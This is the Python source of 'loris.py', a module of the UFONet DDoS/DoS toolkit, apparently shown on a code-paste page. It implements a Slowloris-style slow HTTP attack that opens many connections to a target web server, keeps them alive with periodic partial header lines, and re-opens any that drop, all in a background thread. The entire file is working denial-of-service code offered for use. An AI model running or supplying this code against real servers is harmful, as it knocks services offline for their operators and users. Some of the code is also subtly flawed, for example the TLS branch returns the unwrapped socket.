loris.py 2.6 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. """
  4. UFONet - (DDoS botnet + DoS tool) via Web Abuse - 2018 - by psy (epsylon@riseup.net)
  5. You should have received a copy of the GNU General Public License along
  6. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  8. """
  9. import time, sys, threading, socket, random, ssl
  10. # UFONet Slow HTTP requests (UFOLoris)
  11. def setupSocket(self, ip, port, method):
  12. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  13. sock.settimeout(6)
  14. if port == "443":
  15. ss = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1)
  16. ss.connect((ip, port))
  17. else:
  18. sock.connect((ip, port))
  19. if method == "GET":
  20. sock.send("GET / \r\n".encode("utf-8"))
  21. else:
  22. sock.send("POST / \r\n".encode("utf-8"))
  23. return sock
  24. def tractor(self, ip, port, requests):
  25. for i in range(requests):
  26. try:
  27. method = 'GET'
  28. sock = setupSocket(self, ip, port, method)
  29. print "[Info] Firing 'tractor' beam from: LORIS -> Status: CONNECTED! -> 'Keeping socket open in time...'"
  30. except socket.error:
  31. break
  32. self.sockets.append(sock)
  33. while True: # try to abuse HTTP Headers
  34. for sock in list(self.sockets):
  35. try:
  36. # "Verb Tunneling Abuse" -> [RFC2616]
  37. method = 'POST'
  38. sock.send("X-HTTP-Method: {}\r\n".format('PUT').encode("utf-8"))
  39. except socket.error:
  40. self.sockets.remove(sock)
  41. for i in range(requests - len(self.sockets)):
  42. print("[Info] Re-opening closed LORIS 'tractor' beam -> Status: RE-LINKED!")
  43. try:
  44. method = 'GET'
  45. sock = setupSocket(self, ip, port, method)
  46. if sock:
  47. self.sockets.append(sock)
  48. except socket.error:
  49. break
  50. time.sleep(10)
  51. class LORIS(object):
  52. def __init__(self):
  53. self.sockets = []
  54. def attacking(self, target, requests):
  55. print "\n[Info] Slow HTTP requests (LORIS) is ready to fire: [" , requests, "tractor beams ]\n"
  56. if target.startswith('http://'):
  57. target = target.replace('http://','')
  58. port = 80
  59. elif target.startswith('https://'):
  60. target = target.replace('https://','')
  61. port = 443
  62. ip = socket.gethostbyname(target)
  63. t = threading.Thread(target=tractor, args=(self, ip, port, requests)) # attack with UFOLoris using threading
  64. t.daemon = True
  65. t.start()
  66. time.sleep(10)